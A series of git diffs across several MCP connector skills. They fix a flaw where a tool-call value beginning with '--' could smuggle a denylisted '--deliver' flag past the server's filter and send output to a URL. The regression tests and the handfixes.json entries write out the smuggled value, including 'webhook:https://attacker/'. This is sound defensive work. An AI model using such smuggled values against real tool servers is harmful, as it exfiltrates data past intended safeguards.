+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01
 

--- a/skills/appdirect/CHANGELOG.md
+++ b/skills/appdirect/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-09-01
 
 ### Added

--- a/skills/appdirect/CHANGELOG.md
+++ b/skills/appdirect/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01

--- a/skills/appdirect/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/appdirect/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/appdirect/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/appdirect/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/appdirect/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/appdirect/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/appdirect/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/appdirect/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/appdirect/handfixes.json
+++ b/skills/appdirect/handfixes.json
@@ -391,6 +391,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/appdirect/handfixes.json
+++ b/skills/appdirect/handfixes.json
@@ -406,8 +406,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -417,7 +429,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/atera/CHANGELOG.md
+++ b/skills/atera/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26
 

--- a/skills/atera/CHANGELOG.md
+++ b/skills/atera/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-08-26
 
 ### Changed

--- a/skills/atera/CHANGELOG.md
+++ b/skills/atera/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-08-26

--- a/skills/atera/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/atera/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/atera/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/atera/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/atera/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/atera/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/atera/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/atera/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/atera/handfixes.json
+++ b/skills/atera/handfixes.json
@@ -156,8 +156,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -167,7 +179,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/atera/handfixes.json
+++ b/skills/atera/handfixes.json
@@ -141,6 +141,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/autotask/CHANGELOG.md
+++ b/skills/autotask/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-08-26
 
 ### Fixed

--- a/skills/autotask/CHANGELOG.md
+++ b/skills/autotask/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26
 

--- a/skills/autotask/CHANGELOG.md
+++ b/skills/autotask/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26

--- a/skills/autotask/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/autotask/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/autotask/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/autotask/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
